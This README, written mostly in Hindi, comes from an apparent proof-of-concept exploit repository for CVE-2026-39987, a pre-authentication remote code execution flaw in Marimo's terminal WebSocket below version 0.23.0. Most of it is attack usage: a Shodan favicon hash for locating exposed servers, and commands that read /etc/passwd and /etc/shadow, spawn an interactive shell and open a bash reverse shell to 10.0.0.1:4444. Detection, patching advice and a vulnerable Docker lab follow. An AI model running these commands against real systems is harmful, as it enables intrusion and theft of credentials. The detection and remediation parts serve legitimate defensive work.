
PoC de CVE-2026-39987: RCE pre-autenticación vía WebSocket en Marimo menor a 0.23.0 (CVSS 9.3).
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। बिना स्पष्ट अनुमति के सिस्टम के विरुद्ध इस टूल का अनधिकृत उपयोग अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है।
Marimo के 0.23.0 से पहले के संस्करणों में बिना पूर्व प्रमाणीकरण के रिमोट कमांड निष्पादन (RCE) की गंभीर भेद्यता मौजूद है। /terminal/ws एंडपॉइंट पर्याप्त एक्सेस नियंत्रण लागू नहीं करता है, जिससे एक अनधिकृत हमलावर सिस्टम पर पूर्ण इंटरैक्टिव शेल प्राप्त कर सकता है।
| विवरण | जानकारी |
|---|---|
| CVE | CVE-2026-39987 |
| गंभीरता | CRITICAL |
| CVSS स्कोर | 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) |
| प्रकार | Pre-Auth Remote Code Execution (RCE) |
| वेक्टर | WebSocket (/terminal/ws) |
| प्रभावित उत्पाद | Marimo < 0.23.0 |
| पैच | Marimo ≥ 0.23.0 |
http.favicon.hash:-1864630356
text
-1864630356/api/versionpip install websockets requests
बुनियादी उपयोग
bash
python CVE-2026-39987_PoC.py http://victima.com:8080 "id"
उदाहरण
bash
# सिस्टम जानकारी प्राप्त करें
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"
# संवेदनशील फ़ाइलें पढ़ें
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"
# रिवर्स शेल
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
# इंटरैक्टिव शेल
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ पहचान (सुरक्षित)
निष्क्रिय पहचान स्क्रिप्ट
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Nuclei टेम्पलेट
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987
info:
name: Marimo < 0.23.0 Pre-Auth RCE
severity: critical
# ... (पूर्ण टेम्पलेट शामिल)
🔧 उपचार
तत्काल
यदि सिस्टम एक्सपोज़्ड है तो उसे नेटवर्क से डिस्कनेक्ट करें
Marimo चल रहे पोर्ट तक पहुंच को ब्लॉक करें
संदिग्ध गतिविधि के लिए लॉग की जांच करें
स्थायी
bash
# पैच किए गए संस्करण में अपडेट करें
pip install --upgrade marimo>=0.23.0
# संस्करण सत्यापित करें
marimo --version
# सार्वजनिक रूप से एक्सपोज़ होने पर प्रमाणीकरण कॉन्फ़िगर करें
# 'marimo edit' को कभी भी सीधे इंटरनेट पर एक्सपोज़ न करें
Docker (कमजोर वातावरण)
bash
# परीक्षण के लिए कमजोर संस्करण चलाएं
docker run -p 8080:8080 marimo-team/marimo:0.22.0
# भेद्यता सत्यापित करें
python CVE-2026-39987_detector.py http://localhost:8080
# शोषण करें
python CVE-2026-39987_PoC.py http://localhost:8080 "id"
GitHub Security Advisory
NVD Entry
Pull Request #9098
Marimo Documentation
👥 क्रेडिट
खोज: [शोधकर्ता का नाम]
PoC विकास: [आपका नाम]
पैच: Marimo Team
📜 लाइसेंस
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इस सॉफ़्टवेयर का उपयोग आपके अपने जोखिम पर है।
⭐ यदि यह README आपके लिए उपयोगी था, तो कृपया रिपॉजिटरी को एक स्टार दें।
⚠️ याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है।